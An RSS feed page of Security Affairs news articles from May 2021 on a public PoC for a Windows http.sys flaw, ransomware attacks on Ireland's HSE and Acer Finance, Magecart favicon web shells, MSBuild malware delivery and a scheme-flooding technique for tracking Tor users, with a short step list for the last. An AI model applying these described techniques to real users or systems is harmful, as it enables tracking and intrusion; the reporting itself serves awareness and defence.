RSS Security

🔒
❌ About FreshRSS
There are new articles available, click to refresh the page.
Today — 17 May 2021Security Affairs

Expert released PoC exploit code for Windows CVE-2021-31166 bug

17 May 2021 at 13:45

A security researcher has published a working proof-of-concept exploit code for a wormable Windows IIS server vulnerability tracked as CVE-2021-31166.

Microsoft Patch Tuesday for May 2021 security updates addressed 55 vulnerabilities in Microsoft including a critical HTTP Protocol Stack Remote Code Execution vulnerability tracked as CVE-2021-31166. The flaw could be exploited by an unauthenticated attacker by sending a specially crafted packet to a targeted server utilizing the HTTP Protocol Stack (http.sys) to process packets.

This stack is used by the Windows built-in IIS server, which means that it could be easily exploited if the server is enabled. The flaw is wormable and affects different versions of Windows 10, Windows Server 2004 and Windows Server 20H2.

The security researcher Axel Souchet has published over the weekend a proof-of-concept exploit code for the wormable flaw that impacted Windows IIS.

The PoC exploit code allows to crash an unpatched Windows system running an IIS server, it does not implement worming capabilities.

Anyway attackers could start triggering the vulnerability in the wild, the PoC code could be improved to be actively exploited.

I've built a PoC for CVE-2021-31166 the "HTTP Protocol Stack Remote Code Execution Vulnerability": https://t.co/8mqLCByvCp 🔥🔥 pic.twitter.com/yzgUs2CQO5

— Axel Souchet (@0vercl0k) May 16, 2021

The public availability of the PoC exploit code is another good reason to apply Microsoft Patch Tuesday for May 2021 security updates as soon as possible.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, RCE)

The post Expert released PoC exploit code for Windows CVE-2021-31166 bug appeared first on Security Affairs.

Bitcoin down: 51% attack? No, put the blame on Elon Musk

17 May 2021 at 09:02

The price of Bitcoin falls after Elon Musk declared that its company, Tesla, may have sold holdings of the cryptocurrency

We have a long-debated about the possibility that the Bitcoin price could be influenced by threat actors through 51% attacks, but recent events demonstrate that it could be easier to manipulate its value.

A simple Tweet from an influencer could cause the fall of the price of a cryptocurrency, opening the door for any type of financial speculation.

Do you trust a cryptocurrency system that is influenced by the declaration of a single individual?

Tesla CEO Elon Musk published a Twitter on Sunday to confirm that his company sold or is going to sell the rest of its bitcoin holdings and the news that had a dramatic impact on the Bitcoin value.

bitcoin falls

Bitcoiners are going to slap themselves next quarter when they find out Tesla dumped the rest of their #Bitcoin holdings.

With the amount of hate @elonmusk is getting, I wouldn’t blame him…

— Mr. Whale (@CryptoWhale) May 16, 2021

Bitcoin’s price plummeted after Musk’s posts and is yet to recover, this implies that the price of the most popular cryptocurrency depends on the account of a single man. If someone is able to hack his account can make a lot of money influencing the prices of cryptocurrencies.

Media pointed out that the alleged sale comes just days after Musk declared that Tesla planned to hold rather than sell the Bitcoin it already has.

“A potential sale comes just days after Musk said the company planned to hold rather than sell the bitcoin it already has and intended to use it for transactions as soon as mining transitions to more sustainable energy. Tesla did not immediately respond to a request for comment.” reported CNBC.

Tesla representatives have yet to provide any comment on the event.

In an SEC filing in February, Tesla announced that it bought $1.5 billion worth of bitcoin, then it earned $101 million from sales of bitcoin during the quarter.

Even if Musk has always sustained cryptocurrencies, last week his company “suspended vehicle purchases using bitcoin.” The move was the result of concern over “rapidly increasing use of fossil fuels for bitcoin mining,” and also in that case it had an impact on the price of bitcoin that dropped about 5% in the first minutes after the announcement.

Musk also influenced the price of another cryptocurrency, dogecoin, with the announcement that SpaceX would accept dogecoin as payment to launch “DOGE-1 mission to the Moon.” The announcement pumped up the price of the coin.

Is this really good for cryptocurrencies? Or we are faced with a new real threat to their credibility.

What will be the reason for the next bubble? I focus on sustainability and respect for the environment for cryptocurrencies.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Musk)

The post Bitcoin down: 51% attack? No, put the blame on Elon Musk appeared first on Security Affairs.

Conti ransomware demanded $20M ransom to Ireland Health Service Executive

17 May 2021 at 06:19

Ireland Health Service Executive (HSE) refuses to pay a $20 million ransom demand after its systems were hit by the Conti ransomware gang.

Ireland’s Health Service Executive that was forced to shut down its IT systems on Friday after being targeted with a significant ransomware attack. The Health Service Executive opted to shut down its infrastructure as a precaution to avoid the threat from spreading.

The authorities launched an investigation into the incident that began at around 4.30am on Friday, the government experts are working to determine the extent of the security breach.

The incident caused cancellations and disruption to services at multiple hospitals in the country, fortunately the ongoing coronavirus vaccination campaign was not affected.

“There is a significant ransomware attack on the HSE IT systems. We have taken the precaution of shutting down all our our IT systems in order to protect them from this attack and to allow us fully assess the situation with our own security partners.” reads a statement published by the HSE.” Vaccination appointments are going ahead as normal.”

“We’ve taken a precautionary measure to shut down a lot of our major systems to protect them,” chief executive Paul Reid told broadcaster RTE. “We are at the very early stages of fully understanding the threats, the impact and trying to contain it.”

Now new details about the attack were reported by the media, the HSE shut down all of their IT systems due to a Conti ransomware attack.

Researchers from BleepingComputer revealed that the Conti ransomware gang demanded a $20 million ransom.

“Yesterday, a cybersecurity researcher shared a screenshot of a chat between Conti and Ireland’s HSE with BleepingComputer.” reported BleepingComputer. “Conti further stated that they would provide a decryptor and delete the stolen data if a ransom of $19,999,000 is paid to the threat actors.”

The Conti ransomware gang claims to have stolen 700 GB of sensitive data from the HSE over two weeks. Stolen info includes patient documents, contracts, financial statements, and payroll.

Taoiseach Micheál Martin, the Prime Minister of Ireland, confirmed in a press release that they will not pay ransom.

Conti ransomware operators run a private Ransomware-as-a-Service (RaaS), the malware appeared in the threat landscape at the end of December 2019 and was distributed through TrickBot infections. Experts speculate the operators are members of a Russia-based cybercrime group known as Wizard Spider.

Since August 2020, the group has launched its leak site to threaten its victim to release the stolen data.

The list of victims of the group includes IoT chip maker Advantech, and Broward County Public Schools (BCPS).

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Health Service Executive)

The post Conti ransomware demanded $20M ransom to Ireland Health Service Executive appeared first on Security Affairs.

Yesterday — 16 May 2021Security Affairs

Avaddon Ransomware gang hacked France-based Acer Finance and AXA Asia

16 May 2021 at 17:44

Avaddon ransomware gang has breached the France-based financial consultancy firm Acer Finance.

Avaddon ransomware gang made the headlines again, the cybercrime gang has breached the France-based financial consultancy firm Acer Finance.

Acer Finance operates as an investment management company. The Company offers risk management, mutual funds, analysis, financial planning, and advisory services. Acer Finance serves individuals, entrepreneurs, and institutional investors in France.

The Avaddon ransomware gang is giving Acer Finance 240 hours to communicate and cooperate with them before start leaking the stolen valuable company documents. 

Avaddon Acer Finance

The ransomware gang claims to have stolen confidential company information about clients and employees.

“You can congratulate us on the successful attack on the company, we also have about a lot of confidential information of clients, a lot of confidential information of employees, banking, personal correspondence, contracts, agreements, forms of payment, a lot of data from the secretariat, licenses and much more.” reads the statement published by the group on its leak site.

The hackers pointed out that there is no way to decrypt data without their decryptor, they also threatened the company to target it with a DDoS attack in case they will refuse to pay the ransom.

As proof of the hack, the group published several ID cards, personal documents, contracts, and a screenshot of the folders containing stolen data.

Avaddon Acer Finance 2

The group also announced to have hacked the Asian branch of Axa and stole three terabytes of data

It is curious that recently Axa announced that in France it will no longer reimburse ransomware payments for its customers. The decision is the result of the increased number of ransomware attacks and the large ransom demanded by cybercriminals.

Last week, the Federal Bureau of Investigation (FBI) and the Australian Cyber Security Centre (ACSC) warned of an ongoing Avaddon ransomware campaign targeting organizations worldwide in multiple industries, including government, finance, energy, manufacturing, and healthcare.

The alert published by the ACSC provides a list of countries under attack which includes the US, UK, Germany, France, China, Italy Brazil, India, UAE, France, and Spain.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Avaddon)

The post Avaddon Ransomware gang hacked France-based Acer Finance and AXA Asia appeared first on Security Affairs.

Two flaws could allow bypassing AMD SEV protection system

16 May 2021 at 15:35

The chipmaker AMD published guidance for two new attacks against its SEV (Secure Encrypted Virtualization) protection technology.

Chipmaker AMD has issued guidance for two attacks (CVE-2020-12967, CVE-2021-26311) that allow bypassing the SEV (Secure Encrypted Virtualization) technology implemented to prevent rogue operating systems on virtual machines.

The chipmaker is aware of two research papers, respectively titled “SEVerity: Code Injection Attacks against Encrypted Virtual Machines” and “undeSErVed trust: Exploiting Permutation-Agnostic Remote Attestation,” related to the two attacks above. The findings about the two attacks will be presented by two research teams at this year’s 15th IEEE Workshop on Offensive Technologies (WOOT’21).

AMD Secure Encrypted Virtualization (SEV) isolates virtual machines and the hypervisor, but the two attacks can allow threat actors to inject arbitrary code into the virtual machine even if the protection mechanism is in place.

The first flaw, tracked as CVE-2020-12967, is caused by the lack of nested page table protection in the AMD SEV/SEV-ES feature which could potentially lead to arbitrary code execution within the guest VM if a malicious administrator has access to compromise the server hypervisor.

The second vulnerability, tracked as CVE-2021-26311, resides in the AMD SEV/SEV-ES feature. According to the security advisory, the memory can be rearranged in the guest address space that is not detected by the attestation mechanism which could be used by a malicious hypervisor to potentially lead to arbitrary code execution within the guest VM if a malicious administrator has access to compromise the server hypervisor.

The vulnerabilities impact all AMD EPYC processors, 1st/2nd/3rd Gen AMD EPYC™ Processors and AMD EPYC™ Embedded Processors.

The vendor has provided mitigation in the SEV-SNP feature which is available for enablement in 3rd Gen AMD EPYC™ processors. Customers could mitigate the attacks by enabling SEV-SNP, which is only supported on 3rd Gen AMD EPYC™.  

Customers using prior generations of EPYC processors, which do not support SEV-SNP, should follow security best practices.

The vendor published the following acknowledgement:

  • CVE-2020-12967:  Mathias Morbitzer, Martin Radev and Erick Quintanar Salas from Fraunhofer AISEC and Sergej Proskurin and Marko Dorfhuber from Technical University of Munich
  • CVE-2021-26311: Luca Wilke, Jan Wichelmann, Florian Sieck and Thomas Eisenbarth from University of Lübeck

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, AMD)

The post Two flaws could allow bypassing AMD SEV protection system appeared first on Security Affairs.

MSBuild tool used to deliver RATs filelessly

16 May 2021 at 11:31

Hackers abuses Microsoft Build Engine (MSBuild) to filelessly deliver malware on targeted Windows systems, including RAT and password-stealer.

Researchers from Anomali observed threat actors abusing Microsoft Build Engine (MSBuild) to filelessly deliver remote access trojans and RedLine Stealer password-stealing malware on targeted Windows systems.

“Anomali Threat Research discovered a campaign in which threat actors used MSBuild – a tool used for building apps and gives users an XML schema “that controls how the build platform processes and builds software” – to filelessly deliver RemcosRAT, and RedLine stealer using callbacks.” reads a report published by Anomali.

The campaign has begun in April 2021 and is still ongoing, experts pointed out that it has low or zero detections.

MSBuild is a free and open-source build tool set for managed code as well as native C++ code and was part of .NET Framework. It is used for building apps and gives users an XML schema “that controls how the build platform processes and builds software” – to filelessly deliver RemcosRAT, and RedLine stealer using callbacks.

The MSBuild files employed in the attacks spotted by the experts contained encoded executables and shellcode, some of which were hosted on Russian image-hosting site (joxi[.]net). At the time of this writing, the way the .proj files were distributed has yet to be discovered, anyway the files were used by attackers to execute Remcos or RedLine Stealer.

msbuild Infection-chain

The use of MSBuild allows the attackers to avoid detection while loading the malicious code into memory.

Most of the samples analyzed by Anomali were used to deliver the Remcos RAT, while others were also delivering the Quasar RAT and RedLine Stealer.

Remcos is a commercial software that can be used for remote control, remote admin, remote anti-theft, remote support and pentesting. The Quasar RAT is available for free on GitHub, many other attackers used it in their campaigns, including the Gaza Cybergang, which is also known as Gaza Hackers Team and Molerats.

“The threat actors behind this campaign used fileless delivery as a way to bypass security measures, and this technique is used by actors for a variety of objectives and motivations,” concludes Anomali. “This campaign highlights that reliance on antivirus software alone is insufficient for cyber defense, and the use of legitimate code to hide malware from antivirus technology is effective and growing exponentially.”

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, MSBuild)

The post MSBuild tool used to deliver RATs filelessly appeared first on Security Affairs.

Security Affairs newsletter Round 314

16 May 2021 at 09:51

A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box.

CISA MAR report provides technical details of FiveHands Ransomware
SQL injection issue in Anti-Spam WordPress Plugin exposes User Data
TsuNAME flaw exposes DNS servers to DDoS attacks
City of Tulsa, is the last US city hit by ransomware attack
City of Tulsa, is the latest US city hit by ransomware attack
FBI confirmed that Darkside ransomware gang hit Colonial Pipeline
Threat actors added thousands of Tor exit nodes to carry out SSL stripping attacks
WhatsApp will not deactivate accounts for not accepting new privacy terms
Apple was aware that XcodeGhost impacted 128 Million iOS Users in 2015
FBI and Australia ACSC agencies warn of ongoing Avaddon ransomware attacks
Google open sources cosign tool for verifying containers
Hackers target Windows users exploiting a Zero-Day in Reader
Researcher hacked Apple AirTag two weeks after its launch
FragAttacks vulnerabilities expose all WiFi devices to hack
How Companies Need to Treat User Data and Manage Their Partners
Maybe dont call Saul? Over 30,000 VoIP devices identifiable worldwide, some with suspected vulnerabilities
Microsoft Patch Tuesday for May 2021 fix 4 critical flaws
NSA and ODNI analyze potential risks to 5G networks
TeaBot Android banking Trojan targets banks in Europe
Biden signed executive order to improve the Nations Cybersecurity
Cisco fixes AnyConnect Client VPN zero-day disclosed in November
Security at Bay: Critical Infrastructure Under Attack
US CISA and FBI publish joint alert on DarkSide ransomware
Colonial Pipeline likely paid a $5M ransom to DarkSide
Darkside gang lost control of their servers and funds
Irelands Health Service Executive hit by ransomware attack
Magecart gang hides PHP-based web shells in favicons
Rapid7 says source code, credentials accessed as a result of Codecov supply-chain attack
Scheme flooding fingerprint technique may deanonymize Tor users

If you want also receive the International Press subscribe for free to the Security Affairs newsletter here.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, newsletter)

The post Security Affairs newsletter Round 314 appeared first on Security Affairs.

Pakistan-linked Transparent Tribe APT expands its arsenal

16 May 2021 at 08:39

Alleged Pakistan-Linked cyber espionage group, tracked as Transparent Tribe, targets Indian entities with a new Windows malware.

Researchers from Cisco Talos warn that the Pakistan-linked APT group Transparent Tribe expanded its Windows malware arsenal. The group used the new malware dubbed ObliqueRAT in cyberespionage attacks against Indian targets.

The Operation Transparent Tribe (Operation C-Major, APT36, and Mythic Leopard) was first spotted by Proofpoint Researchers in Feb 2016, in a series of cyber espionage operations against Indian diplomats and military personnel in some embassies in Saudi Arabia and Kazakhstan. At that time, the researchers tracked the sources IP in Pakistan, the attacks were part of a wider operation that relies on multi-vector such as watering hole websites and phishing email campaigns delivering custom RATs dubbed Crimson and Peppy. These RATs are capable of exfiltrate information, take screenshot, and record webcam streams.

Transparent Tribe has been active since at least 2013, it targeted entities across 27 countries, most of them in Afghanistan, Germany, India, Iran, and Pakistan.

In the recent wave of attacks, threat actors employed domains mimicking legitimate Indian military and defense organizations, and other domains posing as content-hosting sites that were used to host malicious artifacts.

“Transparent Tribe, also known as APT36 and Mythic Leopard, continues to create fake domains mimicking legitimate military and defense organizations as a core component of their operations. Cisco Talos’ previous research has mainly linked this group to CrimsonRAT, but new campaigns show they are expanding their Windows malware arsenal with ObliqueRAT.” read the analysis published Cisco Talos. “While military and defense personnel continue to be the group’s primary targets, Transparent Tribe is increasingly targeting diplomatic entities, defense contractors, research organizations and conference attendees, indicating that the group is expanding its targeting.”

These domains were used to distribute weaponized docs used to deliver CrimsonRAT and ObliqueRAT. Experts observed the hackers using resume documents and archives, such as ZIPs and RARs, with alluring themes distributing CrimsonRAT.

Email and maldoc lures employed to deliver the malware used multiple themes, including conference agendas, honeytrap lures and diplomatic themes.

“The actors recently deviated from the CrimsonRAT infection chains to make their ObliqueRAT phishing maldocs appear more legitimate. For example, attackers leveraging ObliqueRAT started hosting their malicious payloads on compromised websites instead of embedding the malware in the maldoc.” continues the report. “In one such case in early 2021, the adversaries used iiaonline[.]in, the Indian Industries Association’s legitimate website, to host ObliqueRAT artifacts.”

Transparent Tribe

In other attacks, the group used fake domains for the 7th Central Pay Commission (7CPC) of India and an Indian think tank called Center For Land Warfare Studies (CLAWS),

“Transparent Tribe relies heavily on the use of maldocs to spread their Windows implants,” the researchers said. “While CrimsonRAT remains the group’s staple Windows implant, their development and distribution of ObliqueRAT in early 2020 indicates they are rapidly expanding their Windows malware arsenal.”

Experts noticed that the Transparent Tribe’s TTPs remained largely unchanged since 2020, but the cyberspies continues to implement new lures as part of its arsenal.

Talos researchers also published the Indicators of Compromise (IoCs) for the new attacks.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, APT)

The post Pakistan-linked Transparent Tribe APT expands its arsenal appeared first on Security Affairs.

Before yesterdaySecurity Affairs

European police dismantle major online investment fraud ring that causes €30 Million in losses

15 May 2021 at 16:41

A joint operation of European law enforcement agencies and coordinated by Europol dismantled a criminal ring involved in investment fraud.

A joint investigation of European law enforcement agencies supported by Europol and Eurojust dismantled a large criminal network involved in investment fraud and money laundering. The operation, led by Germany, involved authorities from Bulgaria, Israel, Latvia, North-Macedonia, Poland, Spain, and Sweden.

The crime ring caused losses of approximately €30 million (US$36 million) to hundreds of victims, at least €7 million in losses in Germany alone.

The authorities arrested 11 people (5 in Bulgaria, 1 in Israel, and 5 in Spain) and searched dozen of locations were searched in Bulgaria, Israel, Poland, North Macedonia and Sweden. The agents seized numerous electronic devices, real estate, jewellery, high-end vehicles, and approximately €2 million in cash, authorities have also frozen multiple bank accounts controlled or owned by shell companies based in different EU countries that were used to launder illegal profits.

The crooks set up at least four online trading platforms that offered significant profits from investments in cryptocurrencies and high-risk options to potential investors. The crime ring published ads for the trading platforms on various social media platforms and search engines.

“The criminal network created different trading online platforms advertising substantial profits from investments in high-risk options and cryptocurrencies. The criminal group ran at least four of such professionally looking trading platforms, luring victims through advertisements in social media and search engines.” reads the press release published by the Europol. “The members of the criminal group were posing as experienced brokers when contacting the victims via the call centre they had set-up. The suspects were using manipulated software to show the gains from the investments and to motivate the victims to invest even more.”

According to the press release, 300 complaints were filed in Spain.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, PLA Unit 61419)

The post European police dismantle major online investment fraud ring that causes €30 Million in losses appeared first on Security Affairs.

Major hacking forums XSS and Exploit ban ads from ransomware gangs

15 May 2021 at 12:31

XSS forum (previously known as DaMaGeLab) one of the most popular hacking forums, announced that it would ban the ads published by ransomware gangs.

The popular hacking forum XSS forum, previously known as DaMaGeLab, announced that that it would ban the ads published by ransomware gangs. The forum is one the most important places of aggregation where ransomware gangs offer their services and attempt to recruit new affiliates in their networks.

The decision to ban ads published by ransomware gangs was an attempt to avoid attracting attention from law enforcement, the forum also prohibits any affiliated program. The recent ransomware attack against the Colonial Pipeline conducted by the Darkside gang triggered the response of the US authorities that resulted in the seizure of their servers.

At the time of this writing, ads from ransomware gangs are still allowed on some hacking forums, but another popular cybercrime forum, Exploit, banned this activity.

Admins of Exploit will also remove affiliate programs from the hacking forum:

“We are glad to see pentesters, malware specialists, coders, but we are not happy with lockers – they attract a lot of attention. This type of activity is not good to us in view of the fact that networks are locked indiscriminately we do not consider it appropriate for RaaS partner programs to be present on our forum. It was decided to remove all affiliate programs and prohibit them as a type of activity on our forum.” reads the statement published by the admins.

Another one bites the dust – forum Exploit bans #ransomware pic.twitter.com/d4nknItz7E

— 𝕯𝖒𝖎𝖙𝖗𝖞 𝕾𝖒𝖎𝖑𝖞𝖆𝖓𝖊𝖙𝖘 (@ddd1ms) May 14, 2021
ransomware ban
Source Twitter

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, ransomware)

The post Major hacking forums XSS and Exploit ban ads from ransomware gangs appeared first on Security Affairs.

QNAP warns of eCh0raix ransomware and Roon Server zero-day attacks

15 May 2021 at 08:41

QNAP warns of an actively exploited Roon Server zero-day flaw and eCh0raix ransomware attacks on its NAS devices.

QNAP warns customers of threat actors that are targeting its Network Attached Storage (NAS) devices with eCh0raix ransomware attacks and exploiting a Roon Server zero-day vulnerability.

The Taiwanese vendor was informed of ongoing eCh0raix ransomware attacks that infected QNAP NAS devices using weak passwords.

“The eCh0raix ransomware has been reported to affect QNAP NAS devices. Devices using weak passwords may be susceptible to attack.” reads the advisory published by the vendor. “We strongly recommend users act immediately to protect their data.”

The company recommends customers to perform the following actions:

  1. Use stronger passwords for your administrator accounts.
  2. Enable IP Access Protection to protect accounts from brute force attacks.
  3. Avoid using default port numbers 443 and 8080.

Independent experts observed a surge in eCh0raix ransomware infection reports between April 19 and April 26.

In the same period, the vendor also warned its users of an ongoing AgeLocker ransomware outbreak.

Unfortunately, the bad news for NAS owners are not ended, the vendor also issued another security advisory to warn of an actively exploited zero-day vulnerability affecting Roon Labs’ Roon Server 2021-02-01 and earlier versions.

“The QNAP security team has detected an attack campaign in the wild related to a vulnerability in Roon Server. QNAP NAS running the following versions of Roon Server may be susceptible to attack: Roon Server 2021-02-01 and earlier.

“We have already notified Roon Labs of the issue and are thoroughly investigating the case. We will release security updates and provide further information as soon as possible.” reads the advisory.”

QNAP recommends users not to expose their devices to the internet, it also recommends disabling Roon Server to prevent potential attacks.

Below the instruction to disable Roon Server NAS devices:

  • Log on to QTS as administrator.Open the App Center and then click .
  • A search box appears.Type “Roon Server” and then press ENTER.
  • Roon Server appears in the search results.Click the arrow below the Roon Server icon.Select Stop.
  • The application is disabled.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, IoT)

The post QNAP warns of eCh0raix ransomware and Roon Server zero-day attacks appeared first on Security Affairs.

Scheme flooding fingerprint technique may deanonymize Tor users

14 May 2021 at 22:19

FingerprintJS experts devised a fingerprinting technique, named scheme flooding, that could allow identifying users across different desktop browsers, including the Tor Browser.

FingerprintJS experts devised a new fingerprinting technique, named scheme flooding, that could allow identifying users while browsing websites using different desktop browsers, including the Tor Browser.

The technique allows to profile users while visiting websites with an ordinary browser, such as Safari, Chrome, and Firefox, and identify their online activity even when they attempt to protect their anonymity using the Tor browser.

The scheme flooding technique leverages custom URL schemes to determine the applications installed by the users

“The vulnerability uses information about installed apps on your computer in order to assign you a permanent unique identifier even if you switch browsers, use incognito mode, or use a VPN.” reads the post published by FingerprintJS. “The scheme flooding vulnerability allows for third party tracking across different browsers and thus is a violation of privacy.”

The scheme flooding vulnerability could be exploited by an attacker to generate a 32-bit cross-browser device identifier that tests the presence of a list of 32 popular applications on the visitors’ system.

Experts pointed out that the analysis of the list of installed applications on your device can allows to discover your habits and other info like occupation and age.

The experts could check if an application is installed using built-in custom URL scheme handlers, for example, by entering skype:// in the address bar of the browser is possible to check the installation of Skype.

To exploit the technique experts provides the following procedure:

  1. Prepare a list of application URL schemes that you want to test. The list may depend on your goals, for example, if you want to check if some industry or interest-specific applications are installed.
  2. Add a script on a website that will test each application from your list. The script will return an ordered array of boolean values. Each boolean value is true if the application is installed or false if it is not.
  3. Use this array to generate a permanent cross-browser identifier. 
  4. Optionally, use machine learning algorithms to guess your website visitors’ occupation, interests, and age using installed application data.

Even if most browsers implements safety mechanisms to prevent such exploits, a combination of CORS policies and browser window features can be used to bypass them.

The experts successfully tested the technique on Chrome 90 (Windows 10, macOS Big Sur), Firefox 88.0.1 (Ubuntu 20.04, Windows 10, macOS Big Sur), Safari 14.1 (macOS Big Sur), Tor Browser 10.0.16 (Ubuntu 20.04, Windows 10, macOS Big Sur), Brave 1.24.84 (Windows 10, macOS Big Sur), Yandex Browser 21.3.0 (Windows 10, macOS Big Sur), and Microsoft Edge 90 (Windows 10, macOS Big Sur). Opera was not tested.

“The exact steps to make the scheme flooding vulnerability possible may vary by browser, but the end result is the same. Getting a unique array of bits associated with a visitor’s identity is not only possible, but can be used on malicious websites in practice. Even Tor Browser can be effectively exploited by tricking a user into typing one character per application we want to test.” concludes the experts.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, PLA Unit 61419)

The post Scheme flooding fingerprint technique may deanonymize Tor users appeared first on Security Affairs.

Darkside gang lost control of their servers and funds

14 May 2021 at 19:29

The operators of the Darkside ransomware announced that they have lost control of their infrastructure and part of the funds the gang obtained from the victims.

Darkside ransomware operators say they have lost control of their servers and funds resulting from their extortion activity, the funds were transferred to an unknown wallet.

“The funds, which the Darkside gang was supposed to split between itself and its affiliates (the threat actors who breach networks and deploy the ransomware), were transferred to an unknown wallet, Darksupp said.” reported TheRecord.

The news was revealed by a member of REvil ransomware gang, known as ‘UNKN,’ in a forum post on the Exploit hacking forum. The post was first spotted by Recorded Future researcher Dmitry Smilyanets, it includes a message allegedly from DarkSide explaining how the gang lost access to their blog, payment servers, and DDoS servers as a result of an action conducted by law enforcement action.

Darkside

“Since the first version, we have promised to speak honestly and openly about problems. A few hours ago, we lost access to the public part of our infrastructure, namely:

  • Blog.
  • Payment server.
  • DOS servers.”

reads the post from UNKN. “Now these servers are unavailable via SSH, the hosting panels are blocked. Hosting support, apart from information “at the request of law enfocement agencies”, does not provide any other information.”

Researchers from security firm Intel471 revealed that on May 13, 2021, DarkSide operators announced they would immediately cease operations of their RaaS program. The ransomware gang also said they would issue decryptors to all their affiliates for the victims. The group also said it plans to compensate all outstanding financial obligations by May 23, 2021. 

Yesterday, President Biden said that the US government doesn’t believe that the attack on the Colonial Pipeline was carried out by a Russia-linked threat actor, he pointed out that US authorities will go after the criminal gang responsible for the attack.

“We do not believe — I emphasize, we do not believe the Russian government was involved in this attack.  But we do have strong reason to believe that criminals who did the attack are living in Russia.  That’s where it came from — were from Russia.” said Biden.    
 
“We have been in direct communication with Moscow about the imperative for responsible countries to take decisive action against these ransomware networks. We’re also going to pursue a measure to disrupt their ability to operate.  And our Justice Department has launched a new task force dedicated to prosecuting ransomware hackers to the full extent of the law.”
 
In the same hours, the leak site operated by DarkSide gang was not available and media outlets speculated it was seized by feds, but BleepingComputer noticed that the Tor payment server used by the group was still up and running.

Other experts speculate the gang opted for an exit scam keeping for them the ransom paid by the victims of its network of affiliates.

Please vote Security Affairs as Best Personal cybersecurity Blog
https://docs.google.com/forms/d/e/1FAIpQLSer_6yOZrL8OO6XjJ9yj3Mlq9LvuOakdTZN9ZmhkFCy1aQLdw/viewform

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, DarkSide)

The post Darkside gang lost control of their servers and funds appeared first on Security Affairs.

Magecart gang hides PHP-based web shells in favicons

14 May 2021 at 14:08

Magecart cybercrime gang is using favicon to hide malicious PHP web shells used to maintain remote access to inject JavaScript skimmers into online stores.

Magecart hackers are distributing malicious PHP web shells hidden in website favicon to inject JavaScript e-skimmers into online stores and steal payment information.

Researchers from Malwarebytes observed threat actors, likely Magecart Group 12, using this technique in attacks aimed at online stores running on Magento 1 websites.

The web shells employed in the attacks are tracked as Smilodon or Megalodon, they dynamically load JavaScript skimming code via server-side requests into online stores. This technique allows bypassing most client-side security tools.

“While performing a crawl of Magento 1 websites, we detected a new piece of malware disguised as a favicon. The file named Magento.png attempts to pass itself as ‘image/png’ but does not have the proper PNG format for a valid image file.” reads the analysis published by Malwarebytes.

MAgecart favicon web shells

Threat actors edited the shortcut icon tags with a path to the fake PNG file. Unlike previous incidents observed by the experts that involved the use of fake favicons to hide malicious JavaScript code, in the last wave of attacks the webshell is written in PHP.

In the latest attacks, the e-skimmer code is introduced into the online store dynamically at the server-side.

The web shell retrieves the e-skimmer from a remote host, the code involved in this attack is similar to a variant used in Cardbleed attacks documented by SanSec researchers in September.

The attribution of the attack to Magecart Group 12 is based on overlaps in TTPs observed in the attacks, experts also noticed that the domain name used in the attack (zolo[.]pw) is associated to the same IP address (217.12.204[.]185) as recaptcha-in[.]pw and google-statik[.]pw, domains previously associated with Magecart Group 12.

“There are a number of ways to load skimming code but the most common one is by calling an external JavaScript resource. When a customer visits an online store, their browser will make a request to a domain hosting the skimmer. Although criminals will constantly expand on their infrastructure it is relatively easy to block these skimmers using a domain/IP database approach.” concludes the analysis.

“In comparison, the skimmer we showed in this blog dynamically injects code into the merchant site. The request to the malicious domain hosting the skimming code is not made client-side but server-side instead. As such a database blocking approach would not work here unless all compromised stores were blacklisted, which is a catch-22 situation. A more effective, but also more complex and prone to false positives approach, is to inspect the DOM in real time and detect when malicious code has been loaded.”

Please vote Security Affairs as Best Personal cybersecurity Blog
https://docs.google.com/forms/d/e/1FAIpQLSer_6yOZrL8OO6XjJ9yj3Mlq9LvuOakdTZN9ZmhkFCy1aQLdw/viewform

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Magecart)

The post Magecart gang hides PHP-based web shells in favicons appeared first on Security Affairs.

Ireland’s Health Service Executive hit by ransomware attack

14 May 2021 at 11:30

Ireland’s Health Service Executive service shut down its IT systems after they were hit with a “significant ransomware attack.”

Another major ransomware attack made the headlines, this time the victim is Ireland’s Health Service Executive that was forced to shut down its IT systems on Friday.

After being targeted with a significant ransomware attack the Health Service Executive opted to shut down its infrastructure as a precaution to avoid the threat from spreading. The good news is that the ongoing coronavirus vaccination campaign was not affected.

“There is a significant ransomware attack on the HSE IT systems. We have taken the precaution of shutting down all our our IT systems in order to protect them from this attack and to allow us fully assess the situation with our own security partners.” reads a statement published by the HSE.” Vaccination appointments are going ahead as normal.”

The authorities launched an investigation into the incident that began at around 4.30am on Friday, the government experts are working to determine the extent of the security breach.

“We’ve taken a precautionary measure to shut down a lot of our major systems to protect them,” chief executive Paul Reid told broadcaster RTE. “We are at the very early stages of fully understanding the threats, the impact and trying to contain it.”

Experts fear that as a result of the ransomware attack there should be cancellations and disruption to services at multiple hospitals in the country.

According to the Associated Press, Dublin’s Rotunda maternity hospital said it was canceling most routine appointments due to the IT issues, calling the situation a “critical emergency.” The attack was classified as fairly sophisticated” by professionals involved in the investigation into the incident. 

Minister for Health Stephen Donnelly declared that the situation was having “a severe impact” on national healthcare services.

“We are working to ensure that the systems and the information is protected. Covid-19 testing and vaccinations are continuing as planned today,” he said.

At the time of this writing the Ireland’s Health Service Executive has yet to receive a ransom demand.

The attack highlighted the importance to protect critical infrastructure from cyber attacks carried out by cybercriminals and nation-state actors.

